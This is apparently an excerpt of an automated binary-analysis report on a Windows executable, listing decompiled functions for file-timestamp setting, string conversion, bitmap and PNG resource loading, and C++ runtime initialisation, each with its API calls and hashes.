                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __alldvrm$_strrchr
                            • String ID:
                            • API String ID: 1036877536-0
                            • Opcode ID: f2926f290b12bce643c0ba6d96074ca090c44e05cafcf7f54dcf12bfeb7df9bf
                            • Instruction ID: 882d77a6cc3fd1f19934a9788bdb2627aca89daa8f8dd0e37b3287e8584e4119
                            • Opcode Fuzzy Hash: f2926f290b12bce643c0ba6d96074ca090c44e05cafcf7f54dcf12bfeb7df9bf
                            • Instruction Fuzzy Hash: 07A15831E0478A9FDB21DF18E8817BEBBA5EF55390F18416EE5C49B2C2CA3C8941C759
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009E9F96, Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 94%
                            			E009E9F96(void* __edx) {
				signed char _t40;
				void* _t41;
				void* _t52;
				signed char _t70;
				void* _t79;
				signed int* _t81;
				signed int* _t84;
				void* _t85;
				signed int* _t88;
				void* _t90;

				_t79 = __edx;
				E009FD940();
				_t84 =  *(_t90 + 0x1038);
				_t70 = 1;
				if(_t84 == 0) {
					L2:
					 *(_t90 + 0x11) = 0;
					L3:
					_t81 =  *(_t90 + 0x1040);
					if(_t81 == 0) {
						L5:
						 *(_t90 + 0x13) = 0;
						L6:
						_t88 =  *(_t90 + 0x1044);
						if(_t88 == 0) {
							L8:
							 *(_t90 + 0x12) = 0;
							L9:
							_t40 = E009E9E7F( *(_t90 + 0x1038));
							 *(_t90 + 0x18) = _t40;
							if(_t40 == 0xffffffff || (_t70 & _t40) == 0) {
								_t70 = 0;
							} else {
								E009EA12F( *((intOrPtr*)(_t90 + 0x103c)), 0);
							}
							_t41 = CreateFileW( *(_t90 + 0x1050), 0x40000000, 3, 0, 3, 0x2000000, 0);
							 *(_t90 + 0x14) = _t41;
							if(_t41 != 0xffffffff) {
								L16:
								if( *(_t90 + 0x11) != 0) {
									E009F082F(_t84, _t79, _t90 + 0x1c);
								}
								if( *(_t90 + 0x13) != 0) {
									E009F082F(_t81, _t79, _t90 + 0x2c);
								}
								if( *(_t90 + 0x12) != 0) {
									E009F082F(_t88, _t79, _t90 + 0x24);
								}
								_t85 =  *(_t90 + 0x14);
								asm("sbb eax, eax");
								asm("sbb eax, eax");
								asm("sbb eax, eax");
								SetFileTime(_t85,  ~( *(_t90 + 0x1b) & 0x000000ff) & _t90 + 0x00000030,  ~( *(_t90 + 0x16) & 0x000000ff) & _t90 + 0x00000024,  ~( *(_t90 + 0x11) & 0x000000ff) & _t90 + 0x0000001c);
								_t52 = CloseHandle(_t85);
								if(_t70 != 0) {
									_t52 = E009EA12F( *((intOrPtr*)(_t90 + 0x103c)),  *(_t90 + 0x18));
								}
								goto L24;
							} else {
								_t52 = E009EB32C( *(_t90 + 0x1040), _t90 + 0x38, 0x800);
								if(_t52 == 0) {
									L24:
									return _t52;
								}
								_t52 = CreateFileW(_t90 + 0x4c, 0x40000000, 3, 0, 3, 0x2000000, 0);
								 *(_t90 + 0x14) = _t52;
								if(_t52 == 0xffffffff) {
									goto L24;
								}
								goto L16;
							}
						}
						 *(_t90 + 0x12) = _t70;
						if(( *_t88 | _t88[1]) != 0) {
							goto L9;
						}
						goto L8;
					}
					 *(_t90 + 0x13) = _t70;
					if(( *_t81 | _t81[1]) != 0) {
						goto L6;
					}
					goto L5;
				}
				 *(_t90 + 0x11) = 1;
				if(( *_t84 | _t84[1]) != 0) {
					goto L3;
				}
				goto L2;
			}













                            0x009e9f96
                            0x009e9f9b
                            0x009e9fa7
                            0x009e9fae
                            0x009e9fb2
                            0x009e9fbf
                            0x009e9fbf
                            0x009e9fc3
                            0x009e9fc3
                            0x009e9fcc
                            0x009e9fd9
                            0x009e9fd9
                            0x009e9fdd
                            0x009e9fdd
                            0x009e9fe6
                            0x009e9ff4
                            0x009e9ff4
                            0x009e9ff8
                            0x009e9fff
                            0x009ea004
                            0x009ea00b
                            0x009ea021
                            0x009ea011
                            0x009ea01a
                            0x009ea01a
                            0x009ea03c
                            0x009ea042
                            0x009ea049
                            0x009ea093
                            0x009ea098
                            0x009ea0a1
                            0x009ea0a1
                            0x009ea0ab
                            0x009ea0b4
                            0x009ea0b4
                            0x009ea0be
                            0x009ea0c7
                            0x009ea0c7
                            0x009ea0d7
                            0x009ea0db
                            0x009ea0eb
                            0x009ea0fb
                            0x009ea101
                            0x009ea108
                            0x009ea110
                            0x009ea11d
                            0x009ea11d
                            0x00000000
                            0x009ea04b
                            0x009ea05c
                            0x009ea063
                            0x009ea122
                            0x009ea12c
                            0x009ea12c
                            0x009ea080
                            0x009ea086
                            0x009ea08d
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ea08d
                            0x009ea049
                            0x009e9fee
                            0x009e9ff2
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e9ff2
                            0x009e9fd3
                            0x009e9fd7
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e9fd7
                            0x009e9fb9
                            0x009e9fbd
                            0x00000000
                            0x00000000
                            0x00000000

                            APIs
                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,009E7F2C,?,?,?), ref: 009EA03C
                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,009E7F2C,?,?), ref: 009EA080
                            • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,009E7F2C,?,?,?,?,?,?,?,?), ref: 009EA101
                            • CloseHandle.KERNEL32(?,?,00000000,?,009E7F2C,?,?,?,?,?,?,?,?,?,?,?), ref: 009EA108
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: File$Create$CloseHandleTime
                            • String ID:
                            • API String ID: 2287278272-0
                            • Opcode ID: 1b4009928b05810783a1d6bc81ce26af4ee7aa8ed36d3503792c5fdca18f2c03
                            • Instruction ID: 564c8a3d47548460f81875bee998c2b0d0233c84b8b081cb27f4ddf882084271
                            • Opcode Fuzzy Hash: 1b4009928b05810783a1d6bc81ce26af4ee7aa8ed36d3503792c5fdca18f2c03
                            • Instruction Fuzzy Hash: B841CD302483C19EE722DE25DC45BEEBBE9AB89300F04091DB5D5D3191D664EE48DB63
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A0B5EA, Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                            Download Yara Rule
                            C-Code - Quality: 85%
                            			E00A0B5EA(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t69;
				signed int _t70;
				short* _t71;

				_t34 =  *0xa1d668; // 0xda86b1c8
				_v8 = _t34 ^ _t70;
				E00A03356(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t6 = _v24 + 8; // 0x31e85006
					_t53 =  *_t6;
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E009FE203(_t67, _v8 ^ _t70);
				}
				_t55 = _t40 + _t40;
				asm("sbb eax, eax");
				if((_t55 + 0x00000008 & _t40) == 0) {
					_t69 = 0;
					L11:
					if(_t69 != 0) {
						E009FE920(_t67, _t69, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
						}
					}
					L14:
					E00A0980D(_t69);
					goto L15;
				}
				asm("sbb eax, eax");
				_t48 = _t40 & _t55 + 0x00000008;
				_t63 = _t55 + 8;
				if((_t40 & _t55 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t69 = E00A07A8A(_t63, _t48 & _t63);
					if(_t69 == 0) {
						goto L14;
					}
					 *_t69 = 0xdddd;
					L9:
					_t69 =  &(_t69[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E00A10EE0();
				_t69 = _t71;
				if(_t69 == 0) {
					goto L14;
				}
				 *_t69 = 0xcccc;
				goto L9;
			}




















                            0x00a0b5f2
                            0x00a0b5f9
                            0x00a0b605
                            0x00a0b60a
                            0x00a0b60f
                            0x00a0b614
                            0x00a0b614
                            0x00a0b617
                            0x00a0b619
                            0x00a0b619
                            0x00a0b61e
                            0x00a0b637
                            0x00a0b63d
                            0x00a0b642
                            0x00a0b6e1
                            0x00a0b6e5
                            0x00a0b6ea
                            0x00a0b6ea
                            0x00a0b706
                            0x00a0b706
                            0x00a0b648
                            0x00a0b650
                            0x00a0b654
                            0x00a0b6a0
                            0x00a0b6a2
                            0x00a0b6a4
                            0x00a0b6a9
                            0x00a0b6c0
                            0x00a0b6c8
                            0x00a0b6d8
                            0x00a0b6d8
                            0x00a0b6c8
                            0x00a0b6da
                            0x00a0b6db
                            0x00000000
                            0x00a0b6e0
                            0x00a0b65b
                            0x00a0b65d
                            0x00a0b65f
                            0x00a0b667
                            0x00a0b684
                            0x00a0b68e
                            0x00a0b693
                            0x00000000
                            0x00000000
                            0x00a0b695
                            0x00a0b69b
                            0x00a0b69b
                            0x00000000
                            0x00a0b69b
                            0x00a0b66b
                            0x00a0b66f
                            0x00a0b674
                            0x00a0b678
                            0x00000000
                            0x00000000
                            0x00a0b67a
                            0x00000000

                            APIs
                            • MultiByteToWideChar.KERNEL32(?,00000000,31E85006,00A034E6,00000000,00000000,00A0451B,?,00A0451B,?,00000001,00A034E6,31E85006,00000001,00A0451B,00A0451B), ref: 00A0B637
                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00A0B6C0
                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00A0B6D2
                            • __freea.LIBCMT ref: 00A0B6DB
                              • Part of subcall function 00A07A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A02FA6,?,0000015D,?,?,?,?,00A04482,000000FF,00000000,?,?), ref: 00A07ABC
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                            • String ID:
                            • API String ID: 2652629310-0
                            • Opcode ID: d8e2c8d0f085c6224246224c1be86046e08c3220dba4db3e3f4d87a9c53ebb62
                            • Instruction ID: 61ae35ef40293de7dd06420fca4f78fb137dbd9638442562fdd316bf6392e9ab
                            • Opcode Fuzzy Hash: d8e2c8d0f085c6224246224c1be86046e08c3220dba4db3e3f4d87a9c53ebb62
                            • Instruction Fuzzy Hash: DC319D72A1020EABDF24CFA4ED55EEE7BA5EB40710F044128FC149A190E736DD51CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009FA4F8, Relevance: 6.1, APIs: 4, Instructions: 55windowCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E009FA4F8(void* __edx, void* __fp0) {
				intOrPtr _v20;
				intOrPtr _v24;
				void _v28;
				void* _t11;
				void* _t13;
				signed int _t18;
				signed int _t19;
				void* _t21;
				void* _t22;
				void* _t26;
				void* _t32;

				_t32 = __fp0;
				_t21 = __edx;
				_t22 = LoadBitmapW( *0xa20060, 0x65);
				_t19 = _t18 & 0xffffff00 | _t22 == 0x00000000;
				_t28 = _t19;
				if(_t19 != 0) {
					_t22 = E009F963A(0x65);
				}
				GetObjectW(_t22, 0x18,  &_v28);
				if(E009F952A(_t28) != 0) {
					if(_t19 != 0) {
						_t26 = E009F963A(0x66);
						if(_t26 != 0) {
							DeleteObject(_t22);
							_t22 = _t26;
						}
					}
					_t11 = E009F958C(_v20);
					_t13 = E009F975D(_t21, _t32, _t22, E009F9549(_v24), _t11);
					DeleteObject(_t22);
					_t22 = _t13;
				}
				return _t22;
			}














                            0x009fa4f8
                            0x009fa4f8
                            0x009fa50e
                            0x009fa512
                            0x009fa515
                            0x009fa517
                            0x009fa520
                            0x009fa520
                            0x009fa529
                            0x009fa536
                            0x009fa541
                            0x009fa54a
                            0x009fa54e
                            0x009fa551
                            0x009fa553
                            0x009fa553
                            0x009fa54e
                            0x009fa558
                            0x009fa568
                            0x009fa570
                            0x009fa572
                            0x009fa574
                            0x009fa57c

                            APIs
                            • LoadBitmapW.USER32(00000065), ref: 009FA508
                            • GetObjectW.GDI32(00000000,00000018,?), ref: 009FA529
                            • DeleteObject.GDI32(00000000), ref: 009FA551
                            • DeleteObject.GDI32(00000000), ref: 009FA570
                              • Part of subcall function 009F963A: FindResourceW.KERNEL32(00000066,PNG,?,?,009FA54A,00000066), ref: 009F964B
                              • Part of subcall function 009F963A: SizeofResource.KERNEL32(00000000,74855B70,?,?,009FA54A,00000066), ref: 009F9663
                              • Part of subcall function 009F963A: LoadResource.KERNEL32(00000000,?,?,009FA54A,00000066), ref: 009F9676
                              • Part of subcall function 009F963A: LockResource.KERNEL32(00000000,?,?,009FA54A,00000066), ref: 009F9681
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                            • String ID:
                            • API String ID: 142272564-0
                            • Opcode ID: 8e56cba9628a545b318a56a7e16733f6b8225d8541ea67a0dc5d31fae1cc537c
                            • Instruction ID: f759e99296441f587d3169bf04791851a2e4819167624878174403e36fd4e004
                            • Opcode Fuzzy Hash: 8e56cba9628a545b318a56a7e16733f6b8225d8541ea67a0dc5d31fae1cc537c
                            • Instruction Fuzzy Hash: F401A23254021D2BC71277A89C46FBF77AE9BC5B51F084120BF04A7291DE518D1753A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A01A89, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                            Download Yara Rule
                            C-Code - Quality: 20%
                            			E00A01A89(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t25;
				void* _t27;
				void* _t28;
				intOrPtr _t30;
				intOrPtr* _t32;
				void* _t34;

				_t29 = __edx;
				_t27 = __ebx;
				_t36 = _a28;
				_t30 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t30);
					_push(_a4);
					E00A020D8(__edx, _t36);
					_t34 = _t34 + 0x10;
				}
				_t37 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t30);
				}
				E009FF1DB(_t28);
				_t32 = _a32;
				_push( *_t32);
				_push(_a20);
				_push(_a16);
				_push(_t30);
				E00A022DA(_t27, _t28, _t29, _t30, _t37);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t30);
				_push(_a4);
				_t25 = E00A01893(_t29, _t32, _t37);
				if(_t25 != 0) {
					E009FF1A9(_t25, _t30);
					return _t25;
				}
				return _t25;
			}












                            0x00a01a89
                            0x00a01a89
                            0x00a01a8c
                            0x00a01a91
                            0x00a01a94
                            0x00a01a96
                            0x00a01a99
                            0x00a01a9c
                            0x00a01a9d
                            0x00a01aa0
                            0x00a01aa5
                            0x00a01aa5
                            0x00a01aa8
                            0x00a01aac
                            0x00a01aaf
                            0x00a01ab4
                            0x00a01ab1
                            0x00a01ab1
                            0x00a01ab1
                            0x00a01ab7
                            0x00a01abd
                            0x00a01ac0
                            0x00a01ac2
                            0x00a01ac5
                            0x00a01ac8
                            0x00a01ac9
                            0x00a01ad2
                            0x00a01ad7
                            0x00a01ada
                            0x00a01ae0
                            0x00a01ae3
                            0x00a01ae6
                            0x00a01ae9
                            0x00a01aea
                            0x00a01aed
                            0x00a01af8
                            0x00a01afc
                            0x00000000
                            0x00a01afc
                            0x00a01b03

                            APIs
                            • ___BuildCatchObject.LIBVCRUNTIME ref: 00A01AA0
                              • Part of subcall function 00A020D8: ___AdjustPointer.LIBCMT ref: 00A02122
                            • _UnwindNestedFrames.LIBCMT ref: 00A01AB7
                            • ___FrameUnwindToState.LIBVCRUNTIME ref: 00A01AC9
                            • CallCatchBlock.LIBVCRUNTIME ref: 00A01AED
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                            • String ID:
                            • API String ID: 2633735394-0
                            • Opcode ID: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
                            • Instruction ID: b61880e98489fc8f75ed0a02f5d81b1fbd8f680ac09b690edf07f4fb766caab6
                            • Opcode Fuzzy Hash: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
                            • Instruction Fuzzy Hash: 6201253210020CBBCF129F95DC41EEA3BBAFF88754F048114FE1866161D332E8A1EBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A015E6, Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00A015E6() {
				void* _t4;
				void* _t8;

				E00A029B7();
				E00A0294B();
				if(E00A0268E() != 0) {
					_t4 = E00A01726(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00A026CA();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





                            0x00a015e6
                            0x00a015eb
                            0x00a015f7
                            0x00a015fc
                            0x00a01601
                            0x00a01603
                            0x00a0160e
                            0x00a01605
                            0x00a01605
                            0x00000000
                            0x00a01605
                            0x00a015f9
                            0x00a015f9
                            0x00a015fb
                            0x00a015fb

                            APIs
                            • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00A015E6
                            • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00A015EB
                            • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00A015F0
                              • Part of subcall function 00A0268E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00A0269F
                            • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00A01605
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                            • String ID:
                            • API String ID: 1761009282-0
                            • Opcode ID: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
                            • Instruction ID: e8d9b7ec42785387ac19e7b706fadd7762b5ba73b7848292674bd5eb6bfe72db
                            • Opcode Fuzzy Hash: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
                            • Instruction Fuzzy Hash: E0C0023800074D50DC113AB5371A7E9130049E27C9F9515C5B9411A4D35907581B1AB2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009F975D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188COMMON
                            Download Yara Rule
                            C-Code - Quality: 51%
                            			E009F975D(void* __edx, long long __fp0, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v0;
				signed int _v4;
				void _v68;
				signed int _v72;
				signed int _v76;
				char _v112;
				intOrPtr _v116;
				intOrPtr* _v120;
				short _v122;
				short _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				intOrPtr* _v140;
				char _v144;
				intOrPtr* _v152;
				intOrPtr _v156;
				intOrPtr* _v164;
				char _v180;
				intOrPtr* _v184;
				intOrPtr* _v192;
				intOrPtr* _v200;
				intOrPtr* _v212;
				signed int _v216;
				signed int _v220;
				intOrPtr* _v224;
				char _v228;
				intOrPtr _v232;
				void* __edi;
				signed int _t71;
				intOrPtr* _t77;
				void* _t78;
				intOrPtr* _t79;
				intOrPtr* _t81;
				short _t89;
				intOrPtr* _t93;
				intOrPtr* _t95;
				intOrPtr* _t97;
				intOrPtr* _t101;
				signed int _t103;
				intOrPtr* _t111;
				intOrPtr* _t113;
				intOrPtr* _t115;
				signed int _t120;
				intOrPtr _t124;
				intOrPtr* _t132;
				intOrPtr* _t134;
				void* _t146;
				void* _t149;
				signed int _t152;
				void* _t154;
				long long* _t155;
				long long _t158;

				_t158 = __fp0;
				if(E009F960F() != 0) {
					_t146 = _a4;
					GetObjectW(_t146, 0x18,  &_v68);
					_t152 = _v4;
					_t120 = _v0;
					asm("cdq");
					_t71 = _v72 * _t152 / _v76;
					if(_t71 < _t120) {
						_t120 = _t71;
					}
					_t149 = 0;
					_push( &_v112);
					_push(0xa133ac);
					_push(1);
					_push(0);
					_push(0xa1417c);
					if( *0xa1dff4() < 0) {
						L18:
						return _t146;
					} else {
						_t77 = _v132;
						_t78 =  *((intOrPtr*)( *_t77 + 0x54))(_t77, _t146, 0, 2,  &_v128);
						_t79 = _v152;
						if(_t78 >= 0) {
							_v144 = 0;
							_push( &_v144);
							_push(_t79);
							if( *((intOrPtr*)( *_t79 + 0x28))() >= 0) {
								_t81 = _v152;
								asm("fldz");
								_push(0);
								_t124 =  *_t81;
								_push(_t124);
								_push(_t124);
								 *_t155 = _t158;
								_push(0);
								_push(0);
								_push(0xa1418c);
								_push(_v156);
								_push(_t81);
								if( *((intOrPtr*)(_t124 + 0x20))() >= 0) {
									E009FE920(_t146,  &_v136, 0, 0x2c);
									_v136 = 0x28;
									_v132 = _t152;
									_v120 = 0;
									_v128 =  ~_t120;
									_v124 = 1;
									_t89 = 0x20;
									_v122 = _t89;
									_t154 =  *0xa1dedc(0,  &_v136, 0,  &_v180, 0, 0);
									asm("sbb ecx, ecx");
									if(( ~_t154 & 0x7ff8fff2) + 0x8007000e >= 0) {
										_t132 = _v216;
										 *((intOrPtr*)( *_t132 + 0x2c))(_t132,  &_v112);
										_t101 = _v120;
										 *((intOrPtr*)( *_t101 + 0x20))(_t101, _v220, _v116, _t120, 3);
										_t103 = _v136;
										_push(_v232);
										_t134 = _v140;
										_v220 = _t103;
										_v228 = 0;
										_v224 = 0;
										_v216 = _t120;
										_push(_t103 * _t120 << 2);
										_push(_v136 << 2);
										_push( &_v228);
										_push(_t134);
										if( *((intOrPtr*)( *_t134 + 0x1c))() < 0) {
											DeleteObject(_t154);
										} else {
											_t149 = _t154;
										}
										_t111 = _v164;
										 *((intOrPtr*)( *_t111 + 8))(_t111);
									}
									_t93 = _v212;
									 *((intOrPtr*)( *_t93 + 8))(_t93);
									_t95 = _v212;
									 *((intOrPtr*)( *_t95 + 8))(_t95);
									_t97 = _v224;
									 *((intOrPtr*)( *_t97 + 8))(_t97);
									if(_t149 != 0) {
										_t146 = _t149;
									}
									goto L18;
								}
								_t113 = _v184;
								 *((intOrPtr*)( *_t113 + 8))(_t113);
							}
							_t115 = _v192;
							 *((intOrPtr*)( *_t115 + 8))(_t115);
							_t79 = _v200;
						}
						 *((intOrPtr*)( *_t79 + 8))(_t79);
						goto L18;
					}
				}
				_push(_a12);
				_push(_a8);
				_push(_a4);
				return E009F9954();
			}
























































                            0x009f975d
                            0x009f9767
                            0x009f9782
                            0x009f978e
                            0x009f9798
                            0x009f979f
                            0x009f97a3
                            0x009f97a4
                            0x009f97aa
                            0x009f97ac
                            0x009f97ac
                            0x009f97b3
                            0x009f97b5
                            0x009f97b6
                            0x009f97be
                            0x009f97bf
                            0x009f97c0
                            0x009f97cd
                            0x009f9948
                            0x00000000
                            0x009f97d3
                            0x009f97d3
                            0x009f97e3
                            0x009f97e8
                            0x009f97ec
                            0x009f97f9
                            0x009f9803
                            0x009f9804
                            0x009f980a
                            0x009f981c
                            0x009f9820
                            0x009f9822
                            0x009f9823
                            0x009f9825
                            0x009f9826
                            0x009f9827
                            0x009f982a
                            0x009f982b
                            0x009f982c
                            0x009f9831
                            0x009f9835
                            0x009f983b
                            0x009f9851
                            0x009f9859
                            0x009f9863
                            0x009f9869
                            0x009f986d
                            0x009f9876
                            0x009f987b
                            0x009f987e
                            0x009f9895
                            0x009f989b
                            0x009f98a9
                            0x009f98ab
                            0x009f98b7
                            0x009f98ba
                            0x009f98cf
                            0x009f98d2
                            0x009f98d6
                            0x009f98da
                            0x009f98de
                            0x009f98e5
                            0x009f98e9
                            0x009f98ed
                            0x009f98f6
                            0x009f9901
                            0x009f9906
                            0x009f9907
                            0x009f990d
                            0x009f9914
                            0x009f990f
                            0x009f990f
                            0x009f990f
                            0x009f991a
                            0x009f9921
                            0x009f9921
                            0x009f9924
                            0x009f992b
                            0x009f992e
                            0x009f9935
                            0x009f9938
                            0x009f993f
                            0x009f9944
                            0x009f9946
                            0x009f9946
                            0x00000000
                            0x009f9944
                            0x009f983d
                            0x009f9844
                            0x009f9844
                            0x009f980c
                            0x009f9813
                            0x009f9816
                            0x009f9816
                            0x009f97f1
                            0x00000000
                            0x009f97f1
                            0x009f97cd
                            0x009f9769
                            0x009f976d
                            0x009f9771
                            0x00000000

                            APIs
                              • Part of subcall function 009F960F: GetDC.USER32(00000000), ref: 009F9613
                              • Part of subcall function 009F960F: GetDeviceCaps.GDI32(00000000,0000000C), ref: 009F961E
                              • Part of subcall function 009F960F: ReleaseDC.USER32(00000000,00000000), ref: 009F9629
                            • GetObjectW.GDI32(?,00000018,?,00000000,?,74855B70), ref: 009F978E
                              • Part of subcall function 009F9954: GetDC.USER32(00000000), ref: 009F995D
                              • Part of subcall function 009F9954: GetObjectW.GDI32(?,00000018,?,?,?,74855B70,?,?,?,?,?,009F977A,?,?,?), ref: 009F998C
